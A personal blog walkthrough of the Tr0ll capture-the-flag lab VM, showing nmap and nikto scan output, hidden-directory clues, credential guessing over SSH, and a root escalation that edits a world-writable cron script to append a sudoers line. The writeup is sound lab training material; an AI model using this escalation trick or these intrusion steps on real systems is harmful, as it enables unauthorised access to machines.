Tuesday, February 7, 2017

Tr0ll

I heard about this VM on /r/netsecstudents (I forget what post). I figured I would give this one a shot, even if its meant to be a bit more difficult then the three Kioptrix VM's I've written about so far.

Right off the bat I perform a nmap and a nikto scan. Nmap showed a few open ports.

root@kali:~# nmap -T4 -A -v 192.168.0.129

Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-02-07 20:09 EST
NSE: Loaded 140 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 20:09
Completed NSE at 20:09, 0.00s elapsed
Initiating NSE at 20:09
Completed NSE at 20:09, 0.00s elapsed
Initiating ARP Ping Scan at 20:09
Scanning 192.168.0.129 [1 port]
Completed ARP Ping Scan at 20:09, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:09
Completed Parallel DNS resolution of 1 host. at 20:09, 0.06s elapsed
Initiating SYN Stealth Scan at 20:09
Scanning 192.168.0.129 [1000 ports]
Discovered open port 21/tcp on 192.168.0.129
Discovered open port 22/tcp on 192.168.0.129
Discovered open port 80/tcp on 192.168.0.129
Completed SYN Stealth Scan at 20:09, 0.05s elapsed (1000 total ports)
Initiating Service scan at 20:09
Scanning 3 services on 192.168.0.129
Completed Service scan at 20:09, 6.03s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 192.168.0.129
NSE: Script scanning 192.168.0.129.
Initiating NSE at 20:09
Completed NSE at 20:09, 0.23s elapsed
Initiating NSE at 20:09
Completed NSE at 20:09, 0.00s elapsed
Nmap scan report for 192.168.0.129
Host is up (0.00020s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx    1 1000     0            8068 Aug 09  2014 lol.pcap [NSE: writeable]
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
|   2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
|_  256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_/secret
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:5B:3D:FD (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.4
Uptime guess: 0.001 days (since Tue Feb  7 20:08:02 2017)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.20 ms 192.168.0.129

NSE: Script Post-scanning.
Initiating NSE at 20:09
Completed NSE at 20:09, 0.00s elapsed
Initiating NSE at 20:09
Completed NSE at 20:09, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.54 seconds
           Raw packets sent: 1023 (45.806KB) | Rcvd: 1015 (41.290KB)



At this point I checked out what a web browser could show:
The page source didn't show much:
<html>
<img src=hacker.jpg>
</html>

This is where the nikto scan cam in handy.
root@kali:~# nikto -h 192.168.0.129
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.0.129
+ Target Hostname:    192.168.0.129
+ Target Port:        80
+ Start Time:         2017-02-07 20:11:48 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x24 0x500438fe37ded
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/secret/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 1 entry which should be manually viewed.
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3092: /secret/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7536 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2017-02-07 20:12:03 (GMT-5) (15 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@kali:~#


Checking out 192.168.0.129/secrets (which is pointed out in the robots.txt page) got another meme:


<html>
<img src="troll.jpg">
</html>

icons/readme had (among other stuff).

Suggested Uses

The following are a few suggestions, to serve as a starting point for ideas.
Please feel free to tweak and rename the icons as you like.

     a.gif
          This might be used to represent PostScript or text layout
          languages.

     alert.black.gif, alert.red.gif
          These can be used to highlight any important items, such as a
          README file in a directory.

     back.gif, forward.gif
          These can be used as links to go to previous and next areas.

     ball.gray.gif, ball.red.gif
          These might be used as bullets.


Going back to the nmap scan I decided to check out the ftp port by going to ftp://192.168.0.129/



This pcap file shows the ftp transfer of secret_stuff.txt. At first I was reading too much into this, thinking I should try and extract the .txt file. I did encounter a great blog showing how to do this though:
https://shankaraman.wordpress.com/tag/how-to-extract-ftp-files-from-wireshark-packet/


"FTP Data Well, well, well, aren't you just a clever little devil, you almost found the sup3rs3cr3tdirlol :-P\n\nSucks, you were so close... gotta TRY HARDER!\n)"



sup3rs3cr3tdirlol - secret directory huh. might as well try to find this. Second try and I got it

192.168.0.129/sup3rs3cr3tdirlol (first try I tried sup3rs3cr3t)


 Another file to decipher...... more trolling. After downloading the I found out the file was an ELF binary.
 

I spent a good amount of time looking up how to edit/view a binary. Even spending a decent amount of time in edb. I was looking for a clue, troll or something at a memory address of "0x0856BF"
http://i2.kym-cdn.com/entries/icons/facebook/000/006/725/desk_flip.jpg


 As an act of pure luck I decided to try "0x0856BF" as part of a web address.




 good_luck/ contained a text file called "which_one_lol.txt"
maleus
ps-aux
felux
Eagle11
genphlux < -- Definitely not this one
usmc8892
blawrg
wytshadow
vis1t0r
overflow
While this_folder_contains_the_password/ contained a text file called "Pass.txt"
Good_job_:)

The folder says the password is in the folder so I guess is password is "Pass.txt" (not Good_job_:))
At first I thought it was genphlux and "Pass.txt" as the password
After many more guesses I get in with the username: overflow

After a good bit of looking around I found another clue.... maybe even a troll:
Before going further I was kicked out (2nd time it happened).

cleaner.py is a python script that performs: "rm -r /tmp/*". Cool thing is this file has rwx permissions for all users. If the file is edited to grant the user overflow root permissions then we're set. The catch is the script needs to run as root to edit sudoers file. Which is a waiting game since the script is already in the crontab.

try:
        os.system('echo overflow        ALL=(ALL) ALL >> /etc/sudoers ')
except:
        sys.exit()


and we have root!
-----------------------------------------------------------------------------------------------------------------------------
 While searching around I also got the OS version:
cat /proc/version
Linux version 3.13.0-32-generic (buildd@roseapple) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 



 There's a few privilege escalation exploit for version 3.13. Might as well try it as well. Like I've done before I copy this over to /var/www and get apache running. This way I can get a copy of it onto the Tr0ll box. I ended up trying four of these before I found one that worked.

There you go. Two ways to get root on this box..... Once you've fought your way past all the Trolling!




No comments:

Post a Comment